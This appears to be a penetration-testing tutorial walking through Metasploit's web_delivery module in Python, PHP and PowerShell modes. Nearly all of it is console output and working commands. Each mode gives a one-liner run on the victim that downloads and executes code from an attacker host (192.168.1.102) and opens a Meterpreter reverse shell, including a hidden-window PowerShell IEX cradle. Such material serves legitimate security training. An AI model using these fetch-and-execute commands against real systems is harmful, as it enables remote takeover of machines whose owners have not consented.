Python Payload Mode
msf exploit(web_delivery) > show options
Module options (exploit/multi/script/web_delivery):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH /test no The URI to use for this exploit (default is random)
Payload options (python/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.1.102 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Python
msf exploit(web_delivery) > run
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.1.102:4444
msf exploit(web_delivery) > [*] Using URL: http://0.0.0.0:8080/test
[*] Local IP: http://192.168.1.102:8080/test
[*] Server started.
[*] Run the following command on the target machine:
python -c "import urllib2; r = urllib2.urlopen('http://192.168.1.102:8080/test'); exec(r.read());"
Next, we run the given command on the victim:
python -c "import urllib2; r = urllib2.urlopen('http://192.168.1.102:8080/test'); exec(r.read());"
PHP Payload Mode
msf exploit(web_delivery) > show options
Module options (exploit/multi/script/web_delivery):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH /test no The URI to use for this exploit (default is random)
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.1.102 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
1 PHP
msf exploit(web_delivery) > run
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.1.102:4444
msf exploit(web_delivery) > [*] Using URL: http://0.0.0.0:8080/test
[*] Local IP: http://192.168.1.102:8080/test
[*] Server started.
[*] Run the following command on the target machine:
php -d allow_url_fopen=true -r "eval(file_get_contents('http://192.168.1.102:8080/test'));"
Powershell Payload Mode
msf exploit(web_delivery) > show options
Module options (exploit/multi/script/web_delivery):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH /test no The URI to use for this exploit (default is random)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: , , seh, thread, process, none)
LHOST 192.168.1.102 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
2 PSH
msf exploit(web_delivery) > run
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.1.102:4444
msf exploit(web_delivery) > [*] Using URL: http://0.0.0.0:8080/test
[*] Local IP: http://192.168.1.102:8080/test
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://192.168.1.102:8080/test'))
Referecnes
https://www.offensive-security.com/metasploit-unleashed/web-delivery/